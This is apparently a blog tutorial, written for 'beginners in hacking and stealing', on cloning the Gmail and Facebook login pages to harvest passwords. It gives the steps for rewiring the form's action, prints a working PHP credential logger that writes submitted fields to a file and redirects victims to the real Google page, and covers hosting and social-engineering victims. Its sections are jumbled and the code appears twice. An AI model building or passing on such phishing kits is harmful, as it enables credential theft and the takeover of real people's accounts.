I created this post for beginners in hacking and stealing who would like to know how to create Facebook, Gmail, Twitter etc social networking fake Phishing pages to steal Passwords. I've wrote only two or three articles on Phishing, so in first post of Phishing "How to hack facebook account using Phishing" many readers asked me how to modify phishing page and change some contents well i can't explain one by one ... so i thought to write an article with complete details, explanation, and Tutorial.
So, In this tutorial I'll teach you to create facebook, gmail, yahoo, twitter, You-tube etc Phishing pages to steal password and Hack Accounts.
What you Must know ?
- Basic knowledge about HTML (Hyper Text Markup Language)
- Basic of How Web Applications Work
- Basic knowledge in PHP (Not Recommended)
- Little about Hosting Files on WWW
Creating Phishing Pages tutorial :
So we'll start from Google & Gmail, Faceboook, Yahoo, Twitter, & You-Tube.
Creating Phishing Page of Google, Gmail and Youtube is Same :
Copy below entire code and paste it into your notepad :
Now, Just save that entire code to desktop with downloaded files, as .PHP extension file for eg : Error.php (so your victim won't realize and he might think that it is some kind of error and didn't logged in, & he'll be redirected to real page) Also create one Blank notepad .txt file and place it at same downloaded file with the name of log.txt
So, its very easy and simple.. now again back to the edited code of .html file and change action value to "Error.php" name of your PHP logger, fine look into below image.
Click on Image to enlarge it
Save it, and Finally you're done *Cheers* you created Gmail Phishing page, now we'll host on Free WebHosting services like 000webhost.com and after all you've to give link to the victim and waits until he enter his email and password, actually Phishing needs a lot of Social Engineering techniques and manipulate users to login. here i've wrote a short article on Social Engineering attacks and Stealing Passwords.
So m gonna test phishing page whether it is working or not! Okay m using 000webhost to host my files of WWW and testing it. and here we go! you can also downloaded already created Gmail Phishing page Click here
Click on Image to enlarge it
And here we got Email and Password :D ... Cool
Click on Image to enlarge it
Creating Facebook Phishing Page :
Mostly all are same methods to create Phishing pages, here facebook is one of the most popular social networking site with billions of user, and according to 2012 Report, Facebook team said daily 500+ fb account get hacked through Phishing techniques.
Creating Phishing Page of Google, Gmail and Youtube is Same :
- Open Gmail.com login page, Hit Ctrl + S [Save it on Desktop]
- You'll get one folder with images + javascript and one .html file
- Do not touch anything in folder, let it be like that only... now open .html file with Notepad or Notepad++, and lets mess with some codes.Click on Image to enlarge it
- If you know HTML & CSS then that code is just piece of cake for you.
- Now, all websites uses HTML form to get ID and Password, simply we just have to modify the code with some changes and connect little PHP file to the HTML form so our application can record Username and password and save it into one log file.
- Now, Search for "action" statement in the Code.Click on Image to enlarge it
- As I told you need to know little about HTML programming, so you can understand how exactly it works and can be used to steal password.
- Okay, fine now you've to change action value with your PHP file.
- Now Just pause this tutorial here and back to desktop, now Open notepad and just write 5 lines PHP code like this :
Click on Image to enlarge it
Copy below entire code and paste it into your notepad :
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
- Creating fb phisher is also same as Gmail, Just replace PHP redirection page to different page.. :) and all steps are same
- You can also download latest Facebook Phisher Page Click here
Soon we'll create tutorial how to create Phishing pages of Twitter and Yahoo!
0 comments:
Post a Comment